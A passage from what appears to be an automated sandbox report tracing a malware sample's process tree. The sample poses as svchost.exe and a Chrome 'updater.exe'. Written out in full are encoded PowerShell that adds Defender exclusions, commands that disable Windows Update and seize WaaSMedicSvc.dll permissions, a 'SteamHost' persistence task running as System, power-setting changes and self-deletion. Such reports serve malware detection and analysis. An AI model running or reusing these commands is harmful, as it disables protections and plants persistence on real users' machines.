      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        6⤵
        
        PID:920
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        6⤵
        
        PID:2232
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        6⤵
        
        PID:2316
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        6⤵
        
        PID:2260
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        6⤵
        
        PID:1288
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        6⤵
        
        PID:1912
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        6⤵
        
        PID:1672
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        6⤵
        
        PID:2496
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:2508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:2544
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2476
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3048
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
    - - C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        5⤵
        Drops file in Windows directory
        
        PID:2504
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        5⤵
        
        PID:2688
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:348
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
        5⤵
        Loads dropped DLL
        
        PID:1812
      - C:\Users\Admin\Chrome\updater.exe
        
        C:\Users\Admin\Chrome\updater.exe
        6⤵
        Executes dropped EXE
        
        PID:2928
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"
        7⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        8⤵
        
        PID:2388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        9⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1464
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        8⤵
        
        PID:2952
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        9⤵
        Launches sc.exe
        
        PID:1084
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        9⤵
        Launches sc.exe
        
        PID:2060
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        9⤵
        Launches sc.exe
        
        PID:2600
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        9⤵
        Launches sc.exe
        
        PID:600
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        9⤵
        Launches sc.exe
        
        PID:2320
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        9⤵
        Launches sc.exe
        
        PID:1936
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:2440
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        9⤵
        Launches sc.exe
        
        PID:684
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:1744
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        9⤵
        Launches sc.exe
        
        PID:2456
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:2580
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        9⤵
        Launches sc.exe
        
        PID:2348
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:2684
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        9⤵
        Launches sc.exe
        
        PID:2936
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:2984
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:264
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2892
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        9⤵
        
        PID:908
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        9⤵
        
        PID:1556
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        9⤵
        
        PID:2824
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        9⤵
        
        PID:2788
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        9⤵
        
        PID:2904
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        9⤵
        
        PID:1880
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        9⤵
        
        PID:712
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        9⤵
        
        PID:2928
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        9⤵
        
        PID:2964
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        9⤵
        
        PID:1660
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        9⤵
        
        PID:2592
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        9⤵
        
        PID:2748
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        9⤵
        
        PID:2012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        8⤵
        Power Settings
        
        PID:2524
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:296
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1568
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        8⤵
        
        PID:1808
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "sjrcqeodaodte"
        9⤵
        
        PID:316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        
        PID:2756
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:2516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2932
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    C:\Users\Admin\AppData\Local\Temp\svchost.exe
    3⤵
    - Executes dropped EXE
    PID:2652
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2268
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        5⤵
        
        PID:2416
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        5⤵
        
        PID:2084
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1964
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:2496
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:1944
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3028
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:1224
      - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        Launches sc.exe
        
        PID:2800
      - C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2932
      - C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        6⤵
        Launches sc.exe
        
        PID:1908
      - C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:592
      - C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:2676
      - C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:1456
      - C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:2700
      - C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2548
      - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        Launches sc.exe
        
        PID:1892
      - C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:1856
      - C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1876
      - C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2332
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        6⤵
        
        PID:1304
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        6⤵
        
        PID:980
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        6⤵
        
        PID:2088
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        6⤵
        
        PID:1576
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        6⤵
        
        PID:1568
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        6⤵
        
        PID:1936
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        6⤵
        
        PID:2228
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        6⤵
        
        PID:1704
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        6⤵
        
        PID:304
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        6⤵
        
        PID:2416
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        6⤵
        
        PID:2448
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        6⤵
        
        PID:684
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:2076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:316
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2104
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2840
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648
    - - C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        5⤵
        Drops file in Windows directory
        
        PID:1016
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        5⤵
        
        PID:1580
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2272
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
        5⤵
        Loads dropped DLL
        
        PID:708
      - C:\Users\Admin\Chrome\updater.exe
        
        C:\Users\Admin\Chrome\updater.exe
        6⤵
        Executes dropped EXE
        
        PID:1880
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"
        7⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1492
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        8⤵
        
        PID:2752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        9⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2020
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add 